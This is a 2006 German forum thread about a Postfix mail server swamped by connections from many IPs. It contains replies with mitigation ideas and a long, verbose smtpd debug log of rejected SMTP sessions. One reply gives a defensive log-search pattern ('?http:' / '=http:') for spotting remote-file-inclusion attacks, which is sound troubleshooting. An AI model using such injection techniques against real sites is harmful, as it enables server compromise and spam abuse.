ddos Attacke auf Postfix Server

inst0000 · Dec 6, 2006

Hallo zusammen,

unser eMail Server (Postfix) wird durch eine DDOS Attacke derzeit
fast komplett lahmgelegt. Hat jemand einen Tip für mich wie man
trotz der Attacke Mails empfangen kann ?

Ich habe bereits 4.000 IP-Absenderadressen über die Firewall gesperrt
aber kaum sind 100 Adressen gesperrt wachsen scheinbar sofort 300
neue Angreifer nach.

Bin für jeden Tip dankbar.

Gruss
Ralf

Sinepp · Dec 6, 2006

Hallo,

Was spricht dagegen ganze Bände zu sperren?

Ansonsten fällt mir gerade auch nichts ein...

Grüße
Sinepp

amnesie · Dec 6, 2006

Hi

Schonmal über greylisting nachgedacht? Wenn das nur Spambots sind, könnte es helfen ...

inst0000 · Dec 6, 2006

Sinepp said:
Hallo,

Was spricht dagegen ganze Bände zu sperren?

Ansonsten fällt mir gerade auch nichts ein...

Grüße
Sinepp

die kommen leider quer beet - China, England, Ungarn, Frankreich, USA ...

inst0000 · Dec 6, 2006

amnesie said:
Hi

Schonmal über greylisting nachgedacht? Wenn das nur Spambots sind, könnte es helfen ...

die rufen nur den smtpd auf, schicken nix, warten einige Sekunden und melden sich dann
wieder ab. Am Anfang der Attacke habe ich locker 200 smptd's im System
gehabt - dem dann natürlich die Füße eingeschlafen sind.

Es sind leider keine Spambots. Ich habe bei einigen deutschen Firmen
angerufen die bei den Angreifern dabei waren. Die nutzten teilweise sogar
Hardware-appliances mit spamassasin etc. für ihre Angriffe aus.

Man ist scheinbar echt machtlos.

Thorsten · Dec 6, 2006

Hallo!
Hast du mal einen Logauszug dieser Attacken?

mfG
Thorsten

DjTom-i · Dec 6, 2006

Hallo,

ich denke kaum das es eine DDos auf dein Postfix ist, eher ein unsicheres Script über welches nun per POST massenweise Spam gefeuert wird oder eine Injection mit welcher eine Datei mit zig tausend Empfänger Adressen hochgeladen und ausgeführt wurde.

Habe erst gestern einen Kundenserver von sowas befreit.

Schau mal bei dem verdächitgen web/Kunden noch POST in den Apache-Logs oder nach "?http:" oder "=http:".

Viel Glück ;-)

inst0000 · Dec 6, 2006

Logauszug

Thorsten said:
Hallo!
Hast du mal einen Logauszug dieser Attacken?

mfG
Thorsten

Sehr gerne ! :

------------------------------------snip-------------------------------

Code:

Dec  6 16:50:39 mail postfix/smtpd[56782]: < lsh810.siteprotect.co.kr[66.232.138.26]: EHLO lsh810.siteprotect.co.kr
Dec  6 16:50:39 mail postfix/smtpd[56782]: > lsh810.siteprotect.co.kr[66.232.138.26]: 250-mail.XXXXXXX.com
Dec  6 16:50:39 mail postfix/smtpd[56782]: > lsh810.siteprotect.co.kr[66.232.138.26]: 250-PIPELINING
Dec  6 16:50:39 mail postfix/smtpd[56782]: > lsh810.siteprotect.co.kr[66.232.138.26]: 250-SIZE
Dec  6 16:50:39 mail postfix/smtpd[56782]: > lsh810.siteprotect.co.kr[66.232.138.26]: 250-VRFY
Dec  6 16:50:39 mail postfix/smtpd[56782]: > lsh810.siteprotect.co.kr[66.232.138.26]: 250-ETRN
Dec  6 16:50:39 mail postfix/smtpd[56782]: match_list_match: lsh810.siteprotect.co.kr: no match
Dec  6 16:50:39 mail postfix/smtpd[56782]: match_list_match: 66.232.138.26: no match
Dec  6 16:50:39 mail postfix/smtpd[56782]: > lsh810.siteprotect.co.kr[66.232.138.26]: 250 8BITMIME
Dec  6 16:50:39 mail postfix/smtpd[56782]: watchdog_pat: 2002b790
Dec  6 16:50:39 mail postfix/smtpd[36034]: < unknown[140.234.28.138]: RCPT TO:<vanyone@XXXXXXX.com>
Dec  6 16:50:39 mail postfix/smtpd[36034]: extract_addr: input: <vanyone@XXXXXXX.com>
Dec  6 16:50:39 mail postfix/smtpd[36034]: smtpd_check_addr: addr=vanyone@XXXXXXX.com
Dec  6 16:50:39 mail postfix/smtpd[36034]: send attr request = rewrite
Dec  6 16:50:39 mail postfix/smtpd[36034]: send attr rule = canonicalize
Dec  6 16:50:39 mail postfix/smtpd[36034]: send attr address = [email]vanyone@XXXXXXX.com[/email]
Dec  6 16:50:39 mail postfix/smtpd[36034]: private/rewrite socket: wanted attribute: address
Dec  6 16:50:39 mail postfix/smtpd[36034]: input attribute name: address
Dec  6 16:50:39 mail postfix/smtpd[36034]: input attribute value: [email]vanyone@XXXXXXX.com[/email]
Dec  6 16:50:39 mail postfix/smtpd[36034]: private/rewrite socket: wanted attribute: (list terminator)
Dec  6 16:50:39 mail postfix/smtpd[36034]: input attribute name: (end)
Dec  6 16:50:39 mail postfix/smtpd[36034]: rewrite_clnt: canonicalize: [email]vanyone@XXXXXXX.com[/email] -> [email]vanyone@XXXXXXX.com[/email]
Dec  6 16:50:39 mail postfix/smtpd[36034]: send attr request = resolve
Dec  6 16:50:39 mail postfix/smtpd[36034]: send attr address = [email]vanyone@XXXXXXX.com[/email]
Dec  6 16:50:39 mail postfix/smtpd[36034]: private/rewrite socket: wanted attribute: transport
Dec  6 16:50:39 mail postfix/smtpd[36034]: input attribute name: transport
Dec  6 16:50:39 mail postfix/smtpd[36034]: input attribute value: local
Dec  6 16:50:39 mail postfix/smtpd[36034]: private/rewrite socket: wanted attribute: nexthop
Dec  6 16:50:39 mail postfix/smtpd[36034]: input attribute name: nexthop
Dec  6 16:50:39 mail postfix/smtpd[36034]: input attribute value: mail.XXXXXXX.com
Dec  6 16:50:39 mail postfix/smtpd[36034]: private/rewrite socket: wanted attribute: recipient
Dec  6 16:50:39 mail postfix/smtpd[36034]: input attribute name: recipient
Dec  6 16:50:39 mail postfix/smtpd[36034]: input attribute value: [email]vanyone@XXXXXXX.com[/email]
Dec  6 16:50:39 mail postfix/smtpd[36034]: private/rewrite socket: wanted attribute: flags
Dec  6 16:50:39 mail postfix/smtpd[36034]: input attribute name: flags
Dec  6 16:50:39 mail postfix/smtpd[36034]: input attribute value: 256
Dec  6 16:50:39 mail postfix/smtpd[36034]: private/rewrite socket: wanted attribute: (list terminator)
Dec  6 16:50:39 mail postfix/smtpd[36034]: input attribute name: (end)
Dec  6 16:50:39 mail postfix/smtpd[36034]: resolve_clnt: `vanyone@XXXXXXX.com' -> transp=`local' host=`mail.XXXXXXX.com' rcpt=`vanyone@XXXXXXX.com' flags= class=local
Dec  6 16:50:39 mail postfix/smtpd[36034]: ctable_locate: install entry key [email]vanyone@XXXXXXX.com[/email]
Dec  6 16:50:39 mail postfix/smtpd[36034]: extract_addr: result: [email]vanyone@XXXXXXX.com[/email]
Dec  6 16:50:39 mail postfix/smtpd[36034]: >>> START Helo command RESTRICTIONS <<<
Dec  6 16:50:39 mail postfix/smtpd[36034]: generic_checks: name=permit_mynetworks
Dec  6 16:50:39 mail postfix/smtpd[36034]: permit_mynetworks: unknown 140.234.28.138
Dec  6 16:50:39 mail postfix/smtpd[36034]: match_hostname: unknown ~? 10.100.30.0/24
Dec  6 16:50:39 mail postfix/smtpd[36034]: match_hostaddr: 140.234.28.138 ~? 10.100.30.0/24
Dec  6 16:50:39 mail postfix/smtpd[36034]: match_hostname: unknown ~? 127.0.0.0/8
Dec  6 16:50:39 mail postfix/smtpd[36034]: match_hostaddr: 140.234.28.138 ~? 127.0.0.0/8
Dec  6 16:50:39 mail postfix/smtpd[36034]: match_list_match: unknown: no match
Dec  6 16:50:39 mail postfix/smtpd[36034]: match_list_match: 140.234.28.138: no match
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=permit_mynetworks status=0
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_unauth_destination
Dec  6 16:50:40 mail postfix/smtpd[36034]: reject_unauth_destination: [email]vanyone@XXXXXXX.com[/email]
Dec  6 16:50:40 mail postfix/smtpd[36034]: permit_auth_destination: [email]vanyone@XXXXXXX.com[/email]
Dec  6 16:50:40 mail postfix/smtpd[36034]: ctable_locate: leave existing entry key [email]vanyone@XXXXXXX.com[/email]
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_unauth_destination status=0
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_non_fqdn_sender
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_non_fqdn_sender status=0
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_non_fqdn_recipient
Dec  6 16:50:40 mail postfix/smtpd[36034]: reject_non_fqdn_address: [email]vanyone@XXXXXXX.com[/email]
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_non_fqdn_recipient status=0
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_unknown_recipient_domain
Dec  6 16:50:40 mail postfix/smtpd[36034]: reject_unknown_address: [email]vanyone@XXXXXXX.com[/email]
Dec  6 16:50:40 mail postfix/smtpd[36034]: ctable_locate: leave existing entry key [email]vanyone@XXXXXXX.com[/email]
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_unknown_recipient_domain status=0
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_non_fqdn_hostname
Dec  6 16:50:40 mail postfix/smtpd[36034]: reject_non_fqdn_hostname: v4sexchange.FSN
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_non_fqdn_hostname status=0
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_invalid_hostname
Dec  6 16:50:40 mail postfix/smtpd[36034]: reject_invalid_hostname: v4sexchange.FSN
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_invalid_hostname status=0
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_unauth_pipelining
Dec  6 16:50:40 mail postfix/smtpd[36034]: reject_unauth_pipelining: RCPT
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_unauth_pipelining status=0
Dec  6 16:50:40 mail postfix/smtpd[36034]: >>> END Helo command RESTRICTIONS <<<
Dec  6 16:50:40 mail postfix/smtpd[36034]: >>> START Sender address RESTRICTIONS <<<
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=permit_mynetworks
Dec  6 16:50:40 mail postfix/smtpd[36034]: permit_mynetworks: unknown 140.234.28.138
Dec  6 16:50:40 mail postfix/smtpd[36034]: match_hostname: unknown ~? 10.100.30.0/24
Dec  6 16:50:40 mail postfix/smtpd[36034]: match_hostaddr: 140.234.28.138 ~? 10.100.30.0/24
Dec  6 16:50:40 mail postfix/smtpd[36034]: match_hostname: unknown ~? 127.0.0.0/8
Dec  6 16:50:40 mail postfix/smtpd[36034]: match_hostaddr: 140.234.28.138 ~? 127.0.0.0/8
Dec  6 16:50:40 mail postfix/smtpd[36034]: match_list_match: unknown: no match
Dec  6 16:50:40 mail postfix/smtpd[36034]: match_list_match: 140.234.28.138: no match
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=permit_mynetworks status=0
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_unauth_destination
Dec  6 16:50:40 mail postfix/smtpd[36034]: reject_unauth_destination: [email]vanyone@XXXXXXX.com[/email]
Dec  6 16:50:40 mail postfix/smtpd[36034]: permit_auth_destination: [email]vanyone@XXXXXXX.com[/email]
Dec  6 16:50:40 mail postfix/smtpd[36034]: ctable_locate: leave existing entry key [email]vanyone@XXXXXXX.com[/email]
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_unauth_destination status=0
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_non_fqdn_sender
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_non_fqdn_sender status=0
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_non_fqdn_recipient
Dec  6 16:50:40 mail postfix/smtpd[36034]: reject_non_fqdn_address: [email]vanyone@XXXXXXX.com[/email]
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_non_fqdn_recipient status=0
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_unknown_recipient_domain
Dec  6 16:50:40 mail postfix/smtpd[36034]: reject_unknown_address: [email]vanyone@XXXXXXX.com[/email]
Dec  6 16:50:40 mail postfix/smtpd[36034]: ctable_locate: leave existing entry key [email]vanyone@XXXXXXX.com[/email]
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_unknown_recipient_domain status=0
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_unauth_pipelining
Dec  6 16:50:40 mail postfix/smtpd[36034]: reject_unauth_pipelining: RCPT
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_unauth_pipelining status=0
Dec  6 16:50:40 mail postfix/smtpd[36034]: >>> END Sender address RESTRICTIONS <<<
Dec  6 16:50:40 mail postfix/smtpd[36034]: >>> START Recipient address RESTRICTIONS <<<
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=permit_mynetworks
Dec  6 16:50:40 mail postfix/smtpd[36034]: permit_mynetworks: unknown 140.234.28.138
Dec  6 16:50:40 mail postfix/smtpd[36034]: match_hostname: unknown ~? 10.100.30.0/24
Dec  6 16:50:40 mail postfix/smtpd[36034]: match_hostaddr: 140.234.28.138 ~? 10.100.30.0/24
Dec  6 16:50:40 mail postfix/smtpd[36034]: match_hostname: unknown ~? 127.0.0.0/8
Dec  6 16:50:40 mail postfix/smtpd[36034]: match_hostaddr: 140.234.28.138 ~? 127.0.0.0/8
Dec  6 16:50:40 mail postfix/smtpd[36034]: match_list_match: unknown: no match
Dec  6 16:50:40 mail postfix/smtpd[36034]: match_list_match: 140.234.28.138: no match
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=permit_mynetworks status=0
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_invalid_hostname
Dec  6 16:50:40 mail postfix/smtpd[36034]: reject_invalid_hostname: v4sexchange.FSN
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_invalid_hostname status=0
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_non_fqdn_hostname
Dec  6 16:50:40 mail postfix/smtpd[36034]: reject_non_fqdn_hostname: v4sexchange.FSN
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_non_fqdn_hostname status=0
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_non_fqdn_sender
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_non_fqdn_sender status=0
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_non_fqdn_recipient
Dec  6 16:50:40 mail postfix/smtpd[36034]: reject_non_fqdn_address: [email]vanyone@XXXXXXX.com[/email]
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_non_fqdn_recipient status=0
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_unknown_sender_domain
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_unknown_sender_domain status=0
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_unknown_recipient_domain
Dec  6 16:50:40 mail postfix/smtpd[36034]: reject_unknown_address: [email]vanyone@XXXXXXX.com[/email]
Dec  6 16:50:40 mail postfix/smtpd[36034]: ctable_locate: leave existing entry key [email]vanyone@XXXXXXX.com[/email]
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_unknown_recipient_domain status=0
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_unauth_pipelining
Dec  6 16:50:40 mail postfix/smtpd[36034]: reject_unauth_pipelining: RCPT
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_unauth_pipelining status=0
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_unauth_destination
Dec  6 16:50:40 mail postfix/smtpd[36034]: reject_unauth_destination: [email]vanyone@XXXXXXX.com[/email]
Dec  6 16:50:40 mail postfix/smtpd[36034]: permit_auth_destination: [email]vanyone@XXXXXXX.com[/email]
Dec  6 16:50:40 mail postfix/smtpd[36034]: ctable_locate: leave existing entry key [email]vanyone@XXXXXXX.com[/email]
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_unauth_destination status=0
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=permit
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=permit status=1
Dec  6 16:50:40 mail postfix/smtpd[36034]: >>> CHECKING RECIPIENT MAPS <<<
Dec  6 16:50:40 mail postfix/smtpd[36034]: ctable_locate: leave existing entry key [email]vanyone@XXXXXXX.com[/email]
Dec  6 16:50:40 mail postfix/smtpd[36034]: maps_find: recipient_canonical_maps: [email]vanyone@XXXXXXX.com[/email]: not found
Dec  6 16:50:40 mail postfix/smtpd[36034]: maps_find: recipient_canonical_maps: vanyone: not found
Dec  6 16:50:40 mail postfix/smtpd[36034]: maps_find: recipient_canonical_maps: @XXXXXXX.com: not found
Dec  6 16:50:40 mail postfix/smtpd[36034]: mail_addr_find: [email]vanyone@XXXXXXX.com[/email] -> (not found)
Dec  6 16:50:40 mail postfix/smtpd[36034]: maps_find: canonical_maps: [email]vanyone@XXXXXXX.com[/email]: not found
Dec  6 16:50:40 mail postfix/smtpd[36034]: maps_find: canonical_maps: vanyone: not found
Dec  6 16:50:40 mail postfix/smtpd[36034]: maps_find: canonical_maps: @XXXXXXX.com: not found
Dec  6 16:50:40 mail postfix/smtpd[36034]: mail_addr_find: [email]vanyone@XXXXXXX.com[/email] -> (not found)
Dec  6 16:50:40 mail postfix/smtpd[36034]: maps_find: virtual_alias_maps: [email]vanyone@XXXXXXX.com[/email]: not found
Dec  6 16:50:40 mail postfix/smtpd[36034]: maps_find: virtual_alias_maps: vanyone: not found
Dec  6 16:50:40 mail postfix/smtpd[36034]: maps_find: virtual_alias_maps: @XXXXXXX.com: not found
Dec  6 16:50:40 mail postfix/smtpd[36034]: mail_addr_find: [email]vanyone@XXXXXXX.com[/email] -> (not found)
Dec  6 16:50:40 mail postfix/smtpd[36034]: send attr request = lookup
Dec  6 16:50:40 mail postfix/smtpd[36034]: send attr table = unix:passwd.byname
Dec  6 16:50:40 mail postfix/smtpd[36034]: send attr flags = 64
Dec  6 16:50:40 mail postfix/smtpd[36034]: send attr key = [email]vanyone@XXXXXXX.com[/email]
Dec  6 16:50:40 mail postfix/smtpd[36034]: private/proxymap socket: wanted attribute: status
Dec  6 16:50:40 mail postfix/smtpd[36034]: input attribute name: status
Dec  6 16:50:40 mail postfix/smtpd[36034]: input attribute value: 1
Dec  6 16:50:40 mail postfix/smtpd[36034]: private/proxymap socket: wanted attribute: value
Dec  6 16:50:40 mail postfix/smtpd[36034]: input attribute name: value
Dec  6 16:50:40 mail postfix/smtpd[36034]: input attribute value: (end)
Dec  6 16:50:40 mail postfix/smtpd[36034]: private/proxymap socket: wanted attribute: (list terminator)
Dec  6 16:50:40 mail postfix/smtpd[36034]: input attribute name: (end)
Dec  6 16:50:40 mail postfix/smtpd[36034]: dict_proxy_lookup: table=unix:passwd.byname flags=0100 key=vanyone@XXXXXXX.com -> status=1 result=
Dec  6 16:50:40 mail postfix/smtpd[36034]: maps_find: local_recipient_maps: [email]vanyone@XXXXXXX.com[/email]: not found
Dec  6 16:50:40 mail postfix/smtpd[36034]: send attr request = lookup
Dec  6 16:50:40 mail postfix/smtpd[36034]: send attr table = unix:passwd.byname
Dec  6 16:50:40 mail postfix/smtpd[36034]: send attr flags = 64
Dec  6 16:50:40 mail postfix/smtpd[36034]: send attr key = vanyone
Dec  6 16:50:40 mail postfix/smtpd[36034]: private/proxymap socket: wanted attribute: status
Dec  6 16:50:40 mail postfix/smtpd[36034]: input attribute name: status
Dec  6 16:50:40 mail postfix/smtpd[36034]: input attribute value: 1
Dec  6 16:50:40 mail postfix/smtpd[36034]: private/proxymap socket: wanted attribute: value
Dec  6 16:50:40 mail postfix/smtpd[36034]: input attribute name: value
Dec  6 16:50:40 mail postfix/smtpd[36034]: input attribute value: (end)
Dec  6 16:50:40 mail postfix/smtpd[36034]: private/proxymap socket: wanted attribute: (list terminator)
Dec  6 16:50:40 mail postfix/smtpd[36034]: input attribute name: (end)
Dec  6 16:50:40 mail postfix/smtpd[36034]: dict_proxy_lookup: table=unix:passwd.byname flags=0100 key=vanyone -> status=1 result=
Dec  6 16:50:40 mail postfix/smtpd[36034]: maps_find: local_recipient_maps: vanyone: not found
Dec  6 16:50:40 mail postfix/smtpd[36034]: send attr request = lookup
Dec  6 16:50:40 mail postfix/smtpd[36034]: send attr table = unix:passwd.byname
Dec  6 16:50:40 mail postfix/smtpd[36034]: send attr flags = 64
Dec  6 16:50:40 mail postfix/smtpd[36034]: send attr key = @XXXXXXX.com
Dec  6 16:50:40 mail postfix/smtpd[36034]: private/proxymap socket: wanted attribute: status
Dec  6 16:50:40 mail postfix/smtpd[36034]: input attribute name: status
Dec  6 16:50:40 mail postfix/smtpd[36034]: input attribute value: 1
Dec  6 16:50:40 mail postfix/smtpd[36034]: private/proxymap socket: wanted attribute: value
Dec  6 16:50:40 mail postfix/smtpd[36034]: input attribute name: value
Dec  6 16:50:40 mail postfix/smtpd[36034]: input attribute value: (end)
Dec  6 16:50:40 mail postfix/smtpd[36034]: private/proxymap socket: wanted attribute: (list terminator)
Dec  6 16:50:40 mail postfix/smtpd[36034]: input attribute name: (end)
Dec  6 16:50:40 mail postfix/smtpd[36034]: dict_proxy_lookup: table=unix:passwd.byname flags=0100 key=@XXXXXXX.com -> status=1 result=
Dec  6 16:50:40 mail postfix/smtpd[36034]: maps_find: local_recipient_maps: @XXXXXXX.com: not found
Dec  6 16:50:40 mail postfix/smtpd[36034]: mail_addr_find: [email]vanyone@XXXXXXX.com[/email] -> (not found)
Dec  6 16:50:40 mail postfix/smtpd[36034]: NOQUEUE: reject: RCPT from unknown[140.234.28.138]: 550 <vanyone@XXXXXXX.com>: Recipient address rejected: User unknown in local recipient table; from=<> to=<vanyone@XXXXXXX.com> proto=ESMTP helo=<v4sexchange.FSN>
Dec  6 16:50:40 mail postfix/smtpd[36034]: > unknown[140.234.28.138]: 550 <vanyone@XXXXXXX.com>: Recipient address rejected: User unknown in local recipient table
Dec  6 16:50:40 mail postfix/smtpd[36034]: watchdog_pat: 2002b790
Dec  6 16:50:40 mail postfix/smtpd[36034]: < unknown[140.234.28.138]: QUIT
Dec  6 16:50:40 mail postfix/smtpd[36034]: > unknown[140.234.28.138]: 221 Bye
Dec  6 16:50:40 mail postfix/smtpd[36034]: disconnect from unknown[140.234.28.138]
Dec  6 16:50:40 mail postfix/smtpd[36034]: master_notify: status 1
Dec  6 16:50:40 mail postfix/smtpd[36034]: connection closed
Dec  6 16:50:40 mail postfix/smtpd[36034]: watchdog_stop: 2002b790
Dec  6 16:50:40 mail postfix/smtpd[36034]: watchdog_start: 2002b790
Dec  6 16:50:40 mail postfix/smtpd[36034]: connection established
Dec  6 16:50:40 mail postfix/smtpd[36034]: master_notify: status 0
Dec  6 16:50:40 mail postfix/smtpd[36034]: name_mask: resource
Dec  6 16:50:40 mail postfix/smtpd[36034]: name_mask: software
Dec  6 16:50:40 mail postfix/smtpd[56782]: < lsh810.siteprotect.co.kr[66.232.138.26]: MAIL From:<> SIZE=17148
Dec  6 16:50:40 mail postfix/smtpd[56782]: extract_addr: input: <>
Dec  6 16:50:40 mail postfix/smtpd[56782]: smtpd_check_addr: addr=
Dec  6 16:50:40 mail postfix/smtpd[56782]: extract_addr: result: 
Dec  6 16:50:40 mail postfix/smtpd[56782]: fsspace: .: block size 512, blocks free 38619728
Dec  6 16:50:40 mail postfix/smtpd[56782]: smtpd_check_size: blocks 512 avail 38619728 min_free 0 msg_size_limit 0
Dec  6 16:50:40 mail postfix/smtpd[56782]: > lsh810.siteprotect.co.kr[66.232.138.26]: 250 Ok
Dec  6 16:50:40 mail postfix/smtpd[56782]: watchdog_pat: 2002b790
Dec  6 16:50:40 mail postfix/smtpd[36034]: connect from boumbo.gamerezo.com[62.93.224.107]
Dec  6 16:50:40 mail postfix/smtpd[36034]: match_list_match: boumbo.gamerezo.com: no match
Dec  6 16:50:40 mail postfix/smtpd[36034]: match_list_match: 62.93.224.107: no match
Dec  6 16:50:40 mail postfix/smtpd[36034]: match_list_match: boumbo.gamerezo.com: no match
Dec  6 16:50:40 mail postfix/smtpd[36034]: match_list_match: 62.93.224.107: no match
Dec  6 16:50:40 mail postfix/smtpd[36034]: > boumbo.gamerezo.com[62.93.224.107]: 220 mail.XXXXXXX.com ESMTP Postfix
Dec  6 16:50:40 mail postfix/smtpd[36034]: watchdog_pat: 2002b790
Dec  6 16:50:40 mail postfix/smtpd[36034]: < boumbo.gamerezo.com[62.93.224.107]: EHLO mail.k-network.com
Dec  6 16:50:40 mail postfix/smtpd[36034]: > boumbo.gamerezo.com[62.93.224.107]: 250-mail.XXXXXXX.com
Dec  6 16:50:40 mail postfix/smtpd[36034]: > boumbo.gamerezo.com[62.93.224.107]: 250-PIPELINING
Dec  6 16:50:40 mail postfix/smtpd[36034]: > boumbo.gamerezo.com[62.93.224.107]: 250-SIZE
Dec  6 16:50:40 mail postfix/smtpd[36034]: > boumbo.gamerezo.com[62.93.224.107]: 250-VRFY
Dec  6 16:50:40 mail postfix/smtpd[36034]: > boumbo.gamerezo.com[62.93.224.107]: 250-ETRN
Dec  6 16:50:40 mail postfix/smtpd[36034]: match_list_match: boumbo.gamerezo.com: no match
Dec  6 16:50:40 mail postfix/smtpd[36034]: match_list_match: 62.93.224.107: no match
Dec  6 16:50:40 mail postfix/smtpd[36034]: > boumbo.gamerezo.com[62.93.224.107]: 250 8BITMIME
Dec  6 16:50:40 mail postfix/smtpd[36034]: watchdog_pat: 2002b790
Dec  6 16:50:40 mail postfix/smtpd[56782]: < lsh810.siteprotect.co.kr[66.232.138.26]: RCPT To:<vprimarily@XXXXXXX.com>
Dec  6 16:50:40 mail postfix/smtpd[56782]: extract_addr: input: <vprimarily@XXXXXXX.com>
Dec  6 16:50:40 mail postfix/smtpd[56782]: smtpd_check_addr: addr=vprimarily@XXXXXXX.com
Dec  6 16:50:40 mail postfix/smtpd[56782]: send attr request = rewrite
Dec  6 16:50:40 mail postfix/smtpd[56782]: send attr rule = canonicalize
Dec  6 16:50:40 mail postfix/smtpd[56782]: send attr address = [email]vprimarily@XXXXXXX.com[/email]
Dec  6 16:50:40 mail postfix/smtpd[56782]: private/rewrite socket: wanted attribute: address
Dec  6 16:50:40 mail postfix/smtpd[56782]: input attribute name: address
Dec  6 16:50:40 mail postfix/smtpd[56782]: input attribute value: [email]vprimarily@XXXXXXX.com[/email]
Dec  6 16:50:40 mail postfix/smtpd[56782]: private/rewrite socket: wanted attribute: (list terminator)
Dec  6 16:50:40 mail postfix/smtpd[56782]: input attribute name: (end)
Dec  6 16:50:40 mail postfix/smtpd[56782]: rewrite_clnt: canonicalize: [email]vprimarily@XXXXXXX.com[/email] -> [email]vprimarily@XXXXXXX.com[/email]
Dec  6 16:50:40 mail postfix/smtpd[56782]: send attr request = resolve
Dec  6 16:50:40 mail postfix/smtpd[56782]: send attr address = [email]vprimarily@XXXXXXX.com[/email]
Dec  6 16:50:40 mail postfix/smtpd[56782]: private/rewrite socket: wanted attribute: transport
Dec  6 16:50:40 mail postfix/smtpd[56782]: input attribute name: transport
Dec  6 16:50:40 mail postfix/smtpd[56782]: input attribute value: local
Dec  6 16:50:40 mail postfix/smtpd[56782]: private/rewrite socket: wanted attribute: nexthop
Dec  6 16:50:40 mail postfix/smtpd[56782]: input attribute name: nexthop
Dec  6 16:50:40 mail postfix/smtpd[56782]: input attribute value: mail.XXXXXXX.com
Dec  6 16:50:40 mail postfix/smtpd[56782]: private/rewrite socket: wanted attribute: recipient
Dec  6 16:50:40 mail postfix/smtpd[56782]: input attribute name: recipient
Dec  6 16:50:40 mail postfix/smtpd[56782]: input attribute value: [email]vprimarily@XXXXXXX.com[/email]
Dec  6 16:50:40 mail postfix/smtpd[56782]: private/rewrite socket: wanted attribute: flags
Dec  6 16:50:40 mail postfix/smtpd[56782]: input attribute name: flags
Dec  6 16:50:40 mail postfix/smtpd[56782]: input attribute value: 256
Dec  6 16:50:40 mail postfix/smtpd[56782]: private/rewrite socket: wanted attribute: (list terminator)
Dec  6 16:50:40 mail postfix/smtpd[56782]: input attribute name: (end)
Dec  6 16:50:40 mail postfix/smtpd[56782]: resolve_clnt: `vprimarily@XXXXXXX.com' -> transp=`local' host=`mail.XXXXXXX.com' rcpt=`vprimarily@XXXXXXX.com' flags= class=local
Dec  6 16:50:40 mail postfix/smtpd[56782]: ctable_locate: install entry key [email]vprimarily@XXXXXXX.com[/email]
Dec  6 16:50:40 mail postfix/smtpd[56782]: extract_addr: result: [email]vprimarily@XXXXXXX.com[/email]
Dec  6 16:50:40 mail postfix/smtpd[56782]: >>> START Helo command RESTRICTIONS <<<
Dec  6 16:50:40 mail postfix/smtpd[56782]: generic_checks: name=permit_mynetworks
Dec  6 16:50:40 mail postfix/smtpd[56782]: permit_mynetworks: lsh810.siteprotect.co.kr 66.232.138.26
Dec  6 16:50:40 mail postfix/smtpd[56782]: match_hostname: lsh810.siteprotect.co.kr ~? 10.100.30.0/24
Dec  6 16:50:40 mail postfix/smtpd[56782]: match_hostaddr: 66.232.138.26 ~? 10.100.30.0/24
Dec  6 16:50:40 mail postfix/smtpd[56782]: match_hostname: lsh810.siteprotect.co.kr ~? 127.0.0.0/8
Dec  6 16:50:40 mail postfix/smtpd[56782]: match_hostaddr: 66.232.138.26 ~? 127.0.0.0/8
Dec  6 16:50:40 mail postfix/smtpd[56782]: match_list_match: lsh810.siteprotect.co.kr: no match
